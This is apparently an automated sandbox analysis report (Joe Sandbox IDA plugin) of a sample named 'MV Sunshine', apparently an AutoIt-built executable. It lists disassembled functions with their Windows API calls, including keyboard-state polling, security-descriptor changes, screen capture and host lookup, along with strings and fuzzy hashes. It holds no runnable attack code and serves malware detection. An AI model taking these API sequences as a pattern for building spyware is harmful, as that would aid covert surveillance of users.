__swprintf.LIBCMT ref: 0068A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0068A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0068A4FE
_memset.LIBCMT ref: 0068A51D
_wcsncpy.LIBCMT ref: 0068A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0068A58E
CloseHandle.KERNEL32(00000000), ref: 0068A599
RemoveDirectoryW.KERNEL32(?), ref: 0068A5A2
CloseHandle.KERNEL32(00000000), ref: 0068A5AC

Strings

\??\%s, xrefs: 0068A496
:, xrefs: 0068A4BD
\, xrefs: 0068A4B2

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 716660d4f794556e11a5ac36cb4b5e8a83f5d05467e79da0f633fbf5b9df63b6
Instruction ID: 0b7721421badbbbef2e7a7e58daaf4ca9545d61da3137f90cbcd14de7f133206
Opcode Fuzzy Hash: 716660d4f794556e11a5ac36cb4b5e8a83f5d05467e79da0f633fbf5b9df63b6
Instruction Fuzzy Hash: 7D31A0B1500119ABEB20AFE0DC49FEB73BEEF89701F1041B6F908D2160E77097858B66

Function 006AC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006AC4EC
GetFocus.USER32 ref: 006AC4FC
GetDlgCtrlID.USER32(00000000), ref: 006AC507
_memset.LIBCMT ref: 006AC632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 006AC65D
GetMenuItemCount.USER32(?), ref: 006AC67D
GetMenuItemID.USER32(?,00000000), ref: 006AC690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 006AC6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 006AC70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006AC744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 006AC779

Strings

0, xrefs: 006AC62A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: bc376ff86013a199206a4d391933fa4098bad3472cf274b7da8f4189f63cccbb
Instruction ID: 0c0ed937a50be83fd3dd53c6e35f82471e5496dba614028444ebb7a6a101d9be
Opcode Fuzzy Hash: bc376ff86013a199206a4d391933fa4098bad3472cf274b7da8f4189f63cccbb
Instruction Fuzzy Hash: 31818E705083119FDB20EF14C984AABBBE6FB9A364F00552DF99597291D730ED05CFA2

Function 006783F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0067874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00678766
Part of subcall function 0067874A: GetLastError.KERNEL32(?,0067822A,?,?,?), ref: 00678770
Part of subcall function 0067874A: GetProcessHeap.KERNEL32(00000008,?,?,0067822A,?,?,?), ref: 0067877F
Part of subcall function 0067874A: HeapAlloc.KERNEL32(00000000,?,0067822A,?,?,?), ref: 00678786
Part of subcall function 0067874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0067879D

Part of subcall function 006787E7: GetProcessHeap.KERNEL32(00000008,00678240,00000000,00000000,?,00678240,?), ref: 006787F3
Part of subcall function 006787E7: HeapAlloc.KERNEL32(00000000,?,00678240,?), ref: 006787FA
Part of subcall function 006787E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00678240,?), ref: 0067880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00678458
_memset.LIBCMT ref: 0067846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0067848C
GetLengthSid.ADVAPI32(?), ref: 0067849D
GetAce.ADVAPI32(?,00000000,?), ref: 006784DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006784F6
GetLengthSid.ADVAPI32(?), ref: 00678513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00678522
HeapAlloc.KERNEL32(00000000), ref: 00678529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0067854A
CopySid.ADVAPI32(00000000), ref: 00678551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00678582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006785A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 006785BC

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: b5bd96407f32e946e3a01fd03377d214d4fa8e9215bcdb14af72f21f529ec4f2
Instruction ID: 47306bf3de66098c3a21cef6da4607f6be52affe3cee352412fd857396951d3d
Opcode Fuzzy Hash: b5bd96407f32e946e3a01fd03377d214d4fa8e9215bcdb14af72f21f529ec4f2
Instruction Fuzzy Hash: 05611C7194010AAFDF149F94DC49AEEBBBAFF05300F148269F919A7291DB31AE05CF60

Function 0069762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 006976A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 006976AE
CreateCompatibleDC.GDI32(?), ref: 006976BA
SelectObject.GDI32(00000000,?), ref: 006976C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0069771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00697757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0069777B
SelectObject.GDI32(00000006,?), ref: 00697783
DeleteObject.GDI32(?), ref: 0069778C
DeleteDC.GDI32(00000006), ref: 00697793
ReleaseDC.USER32(00000000,?), ref: 0069779E

Strings

(, xrefs: 00697723

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: ef7679a107927c292caf61bacdd61fc45e421d61a271cd0ab1ef39fc8370544d
Instruction ID: acbc1ef13ea1c723d0d14bfd0da5ed752db6ab0574cc73180c77193a8e2ad15e
Opcode Fuzzy Hash: ef7679a107927c292caf61bacdd61fc45e421d61a271cd0ab1ef39fc8370544d
Instruction Fuzzy Hash: 87513975904209EFCB15DFA8CC85EAEBBBAEF49710F14852DF94997210D731A941CF60

Function 00626BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00640B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00626C6C,?,00008000), ref: 00640BB7

Part of subcall function 006248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006248A1,?,?,006237C0,?), ref: 006248CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00626D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00626E5A

Part of subcall function 006259CD: _wcscpy.LIBCMT ref: 00625A05

Part of subcall function 0064387D: _iswctype.LIBCMT ref: 00643885

Strings

Error opening the file, xrefs: 0065E866, 0065E8E1
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0065E84A
EA06, xrefs: 0065E87B
>>>AUTOIT SCRIPT<<<, xrefs: 0065E8BF
AU3!, xrefs: 00626CC1
Unterminated string, xrefs: 0065EC0D
Bad directive syntax error, xrefs: 0065EBC6

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: ac501d04769610e88a18df26c4031c6fff8642815937a6e56224eb0a66f1ab6a
Instruction ID: 8c10ae9f777c8b6893473f25e3671dfa17e88a63f96e062f48b392e46ca6e131
Opcode Fuzzy Hash: ac501d04769610e88a18df26c4031c6fff8642815937a6e56224eb0a66f1ab6a
Instruction Fuzzy Hash: D302AC311087519FCB64EF24D881AAFBBE6BF89314F04491DF886972A1DB31DA49CF46

Function 006245DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006245F9
GetMenuItemCount.USER32(006E6890), ref: 0065D7CD
GetMenuItemCount.USER32(006E6890), ref: 0065D87D
GetCursorPos.USER32(?), ref: 0065D8C1
SetForegroundWindow.USER32(00000000), ref: 0065D8CA
TrackPopupMenuEx.USER32(006E6890,00000000,?,00000000,00000000,00000000), ref: 0065D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0065D8E9

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 1a1dc0218f5ef9eb530b3318b973694328ae577e7cb7d4aca202f2d0afc61422
Instruction ID: b3f9c5bf6c66bce16c74dbea6f05a748d87af599c2d9bd2d24404764906c0221
Opcode Fuzzy Hash: 1a1dc0218f5ef9eb530b3318b973694328ae577e7cb7d4aca202f2d0afc61422
Instruction Fuzzy Hash: 86712430601216BFEB309F54DC85FEABF66FF05365F200216F915A62E1CBB16814DB95

Function 00698BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00698BEC
CoInitialize.OLE32(00000000), ref: 00698C19
CoUninitialize.OLE32 ref: 00698C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00698D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00698E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,006B2C0C), ref: 00698E84
CoGetObject.OLE32(?,00000000,006B2C0C,?), ref: 00698EA7
SetErrorMode.KERNEL32(00000000), ref: 00698EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00698F3A
VariantClear.OLEAUT32(?), ref: 00698F4A

Strings

,,k, xrefs: 00698BD6

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,k
API String ID: 2395222682-759674344
Opcode ID: 2c24d4f3895ac7f0f4b8c85ec28a20fc112861637f037b05e21c9efe47784191
Instruction ID: 837eb80d5f06adf6b9933c36bf8e68c14353ddce52952e365600033b3116ac30
Opcode Fuzzy Hash: 2c24d4f3895ac7f0f4b8c85ec28a20fc112861637f037b05e21c9efe47784191
Instruction Fuzzy Hash: C2C125B1208305AFDB40EF64C88496BB7EAFF8A348F10495DF5899B251DB31ED05CB52

Function 006A10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,006A0038,?,?), ref: 006A10BC

Strings

HKCR, xrefs: 006A1164
HKEY_LOCAL_MACHINE, xrefs: 006A1125
HKCU, xrefs: 006A11AC
HKEY_CURRENT_CONFIG, xrefs: 006A1179
HKU, xrefs: 006A11CE
HKLM, xrefs: 006A113A
HKEY_CLASSES_ROOT, xrefs: 006A114F
HKEY_USERS, xrefs: 006A11BD
HKEY_CURRENT_USER, xrefs: 006A119B
HKCC, xrefs: 006A118A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 31c136870cef92f3451111bb00fbf5a3ddec53cf1a777d08153bbcca7fcfe0bb
Instruction ID: cf50ee6a7867a4248aee5b821e461abf5cf865a1c80eed0f7004c8df43148881
Opcode Fuzzy Hash: 31c136870cef92f3451111bb00fbf5a3ddec53cf1a777d08153bbcca7fcfe0bb
Instruction Fuzzy Hash: 3541483090026ACBDF10EF90DC91AEA3727AF13340F104469EDA15B396DB31AE5ACF64

Function 00685569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

Part of subcall function 00627A84: _memmove.LIBCMT ref: 00627B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006855D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006855E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006855F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0068560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0068561C

Strings

play PlayMe wait, xrefs: 00685606
close PlayMe, xrefs: 006855E3, 00685610
status PlayMe mode, xrefs: 006855CD
alias PlayMe, xrefs: 006855AB
play PlayMe, xrefs: 00685617
open , xrefs: 00685581

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 90956c409bb6ad46b349afec09e8f249d7a99cfddfd6ca70b972ec4236841894
Instruction ID: c08d31c728c7aae8b1f5b64edfb0015d787b67873dcbf6b6947158a243363fee
Opcode Fuzzy Hash: 90956c409bb6ad46b349afec09e8f249d7a99cfddfd6ca70b972ec4236841894
Instruction Fuzzy Hash: DB11E23099456979D720B6A1DC4ACFF7B7FEF91B00F41052AB401E21D1EE601D45CAB2

Function 006848F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0068490E
gethostname.WSOCK32(?,00000100), ref: 00684928
gethostbyname.WSOCK32(?), ref: 00684935
_wcscpy.LIBCMT ref: 0068495D
_memmove.LIBCMT ref: 00684970
inet_ntoa.WSOCK32(?), ref: 0068497B
_strcat.LIBCMT ref: 00684989
_wcscpy.LIBCMT ref: 006849A0
WSACleanup.WSOCK32 ref: 006849AE
_wcscpy.LIBCMT ref: 006849BC

Strings

0.0.0.0, xrefs: 00684957

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 2d7055cd1f6b6e40b24a308d2874a02ef91b7a9dba3ec702f50745e533fab359
Instruction ID: 817315f2d4feaebba87ce5c6d52f213d4400069fa2b16f8b07fadd364dc8550b
Opcode Fuzzy Hash: 2d7055cd1f6b6e40b24a308d2874a02ef91b7a9dba3ec702f50745e533fab359
Instruction Fuzzy Hash: 07110531904116ABCB70FB64EC06EDB77BE9F02710F01027AF40996151EF749A81CB66

Function 00685217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0068521C

Part of subcall function 00640719: timeGetTime.WINMM(?,7694B400,00630FF9), ref: 0064071D

Sleep.KERNEL32(0000000A), ref: 00685248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0068526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0068528E
SetActiveWindow.USER32 ref: 006852AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006852BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 006852DA
Sleep.KERNEL32(000000FA), ref: 006852E5
IsWindow.USER32 ref: 006852F1
EndDialog.USER32(00000000), ref: 00685302

Strings

BUTTON, xrefs: 00685280

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: fa0afd035e82b90a01558ecfb323452aa02453dad061a08d9297551a6cb2e15f
Instruction ID: bda176ce0c2c4ef39b29f114548f167164f99335bd3b68ebcb8c195a539b2f2c
Opcode Fuzzy Hash: fa0afd035e82b90a01558ecfb323452aa02453dad061a08d9297551a6cb2e15f
Instruction Fuzzy Hash: 63218470204B44AFE7007FA0EDC9A753BABEB56396F043529F10285271DF61AD458F62

Function 0068D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00629997: __itow.LIBCMT ref: 006299C2
Part of subcall function 00629997: __swprintf.LIBCMT ref: 00629A0C

CoInitialize.OLE32(00000000), ref: 0068D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0068D8E8
SHGetDesktopFolder.SHELL32(?), ref: 0068D8FC
CoCreateInstance.OLE32(006B2D7C,00000000,00000001,006DA89C,?), ref: 0068D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0068D9B7
CoTaskMemFree.OLE32(?,?), ref: 0068DA0F
_memset.LIBCMT ref: 0068DA4C
SHBrowseForFolderW.SHELL32(?), ref: 0068DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0068DAAB
CoTaskMemFree.OLE32(00000000), ref: 0068DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0068DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 0068DAEB

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: ff65d8a32d1affad78d78eda4390f18d2bb27f64d6dc9b8bc825d30521a85469
Instruction ID: 52e1397a115c29d4dd6a79f32cd0452255133919e3252f532afa17e9d736d611
Opcode Fuzzy Hash: ff65d8a32d1affad78d78eda4390f18d2bb27f64d6dc9b8bc825d30521a85469
Instruction Fuzzy Hash: 29B1FA75A00119AFDB44EFA4C884DAEBBFAEF49314F148569F809EB251DB30AD41CF64

Function 0068052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 006805A7
SetKeyboardState.USER32(?), ref: 00680612
GetAsyncKeyState.USER32(000000A0), ref: 00680632
GetKeyState.USER32(000000A0), ref: 00680649
GetAsyncKeyState.USER32(000000A1), ref: 00680678
GetKeyState.USER32(000000A1), ref: 00680689
GetAsyncKeyState.USER32(00000011), ref: 006806B5
GetKeyState.USER32(00000011), ref: 006806C3
GetAsyncKeyState.USER32(00000012), ref: 006806EC
GetKeyState.USER32(00000012), ref: 006806FA
GetAsyncKeyState.USER32(0000005B), ref: 00680723
GetKeyState.USER32(0000005B), ref: 00680731

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 3cb871cbbe6c2011070fd17f8bd263958b1ab48960c5a49f03cc37800a6d28d7
Instruction ID: acbc9aa18d30084960543314f15a7f7f870752063331dcf3b56d91a4d80efb0d
Opcode Fuzzy Hash: 3cb871cbbe6c2011070fd17f8bd263958b1ab48960c5a49f03cc37800a6d28d7
Instruction Fuzzy Hash: 16512E70A0478419FB74FBB085557EABFB69F02340F084B9DD5C25A2C2D654AB8CCF66

Function 0067C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0067C746
GetWindowRect.USER32(00000000,?), ref: 0067C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0067C7B6
GetDlgItem.USER32(?,00000002), ref: 0067C7C1
GetWindowRect.USER32(00000000,?), ref: 0067C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0067C827
GetDlgItem.USER32(?,000003E9), ref: 0067C835
GetWindowRect.USER32(00000000,?), ref: 0067C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0067C889
GetDlgItem.USER32(?,000003EA), ref: 0067C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0067C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 0067C8C1

Memory Dump Source

